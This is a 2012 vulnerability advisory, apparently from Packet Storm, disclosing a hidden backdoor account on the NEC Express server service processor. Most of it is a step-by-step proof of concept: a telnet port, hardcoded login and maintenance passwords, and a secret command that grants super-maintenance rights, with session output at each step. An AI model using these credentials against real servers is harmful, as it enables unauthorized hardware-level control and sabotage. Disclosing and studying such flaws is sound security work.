NEC Backdoor Administrative Account

2012-05-12T00:00:00
ID PACKETSTORM:112649
Type packetstorm
Reporter Djamshut Saarash
Modified 2012-05-12T00:00:00

Description

                                        
                                            ` H!  
  
NEC Corp. has a product line of high perfomance servers  
- http://www.nec.com.sg/index.php?q=products/enterprise-servers  
  
In the documentations it is said that there is two user privilege  
levels:  
  
1. Common user - who can monitor the system status  
  
2. Admin user - for configuring system hardware  
  
but there is another very high privilege user, who can manipulate  
memory and produce hardware falure.  
  
  
POC  
  
Connect to the service processor of the NEC Express server with the  
telnet client on port 5001:  
  
  
Integrated Service Processor.  
  
Cabinet-ID:xx, Location:y, State:ssssss  
  
iSP login: spfw<ENTER>  
  
iSP password: nec<ENTER>  
  
Copyright (C) 2005 NEC Corporation, All Rights Reserved.  
  
Welcome to Integrated Service Processor.  
  
iSP FW version : 01.00 generated on 01/01/2005 19:20:33  
  
iSP MAIN MENU  
  
0) OS(BIOS) serial console of partition#0 (INITIALIZING )  
  
1) OS(BIOS) serial console of partition#1 (RUNNING )  
  
V) Virtual System Operator Panel  
  
S) iSP commands  
  
E) Exit  
  
DISCONNECTALL) disconnect all console connections  
  
iSPyz> s<ENTER>  
  
  
Go to maintanance mode with the command "cm", default password mainte  
  
Now at the command mode enter (With the periods at the end):  
  
  
iSP0m:MNT> nec=topvendor.  
  
??? : good-bye.  
  
Command mode was changed to super-maintenance mode.  
  
BE CAREFUL to use each command.  
  
iSP0m:@@@>  
  
  
you now have super admin rights at the hardware level of the  
supercomputer!  
  
  
Thats it.....  
`